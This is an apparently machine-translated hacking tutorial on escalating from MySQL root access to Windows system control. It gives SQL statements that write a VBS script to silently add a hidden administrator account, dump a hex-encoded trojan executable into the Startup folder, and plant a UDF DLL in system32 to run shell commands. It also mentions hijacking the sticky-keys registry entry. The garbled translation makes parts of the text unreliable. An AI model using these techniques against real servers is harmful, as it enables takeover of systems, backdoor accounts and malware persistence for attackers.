Eliminate all root

Author: FoolishQiang address: http://hi.baidu.com/foolishqiang/

I have already written a lot about MYSQL Elevation of Privilege, but some of my friends are connected to ROOT, but cannot execute CMD. Return whatever execution:

An error occurred while querying the database. Check whether the SQL statement create function using shell returns string soname udf. dll syntax is correct. Cant open shared library udf. dll (errno: 0)

////////////////////////////////////

We are using server components for VBS elevation:

///////////////////

Construction statement:

/////////////////

Create table a (cmd text );

Insert into a values ("set wshshell = createobject (" "wscript. shell "")");

Insert into a values ("a = wshshell. run (" "cmd.exe/c net user foolishqiang/add" ", 0 )");

Insert into a values ("B = wshshell. run (" "cmd.exe/c net localgroup administrators foolishqiang/add" ", 0 )");

///////////////////////

I added a parameter: 0, which means the execution is performed silently. No echo. 0 indicates that the CMD window is not displayed and the operation is quiet.

////////////////////////////////////

The above method generally adds a MYSQL Elevation of Privilege that I previously wrote to solve the Elevation of Privilege problem. We can also write an exe file in hexadecimal notation.

///////////////////////////

Create table a (cmd BLOB );

Insert into a values (CONVERT (Trojan hexadecimal code, CHAR ));

Select * from a into dumpfile C: \ Documents ents and Settings \ All Users \ Start Menu \ Program start \ foolishqiang.exe

Note: The path must be written \.

//////////////////////////////////////// ///////

It should be said that the summary of root includes dll Elevation of Privilege. Vbs has been authorized. Exe and Linx Mysql BackDoor.

If necessary. Dry Point root

And MIX. DLL.

Create table temp_mix (abc longblob );
Insert into temp_mix values (load_file (D: \ udf. dll); // path
Select * from temp_mix into dumpfile C: \ Windows \ system32 \ udf. dll;
Create function MyCmd returns string soname udf. dll;
Select MyCmd (net user );
Drop table if exists temp_mix;

This is generally not used in many cases.

/////////////////

We can also construct statements to hijack registry shift. Instead of replacement (with protection ). In this way, you can also raise the right.

I have already mentioned the Root Privilege Escalation method.

You can't laugh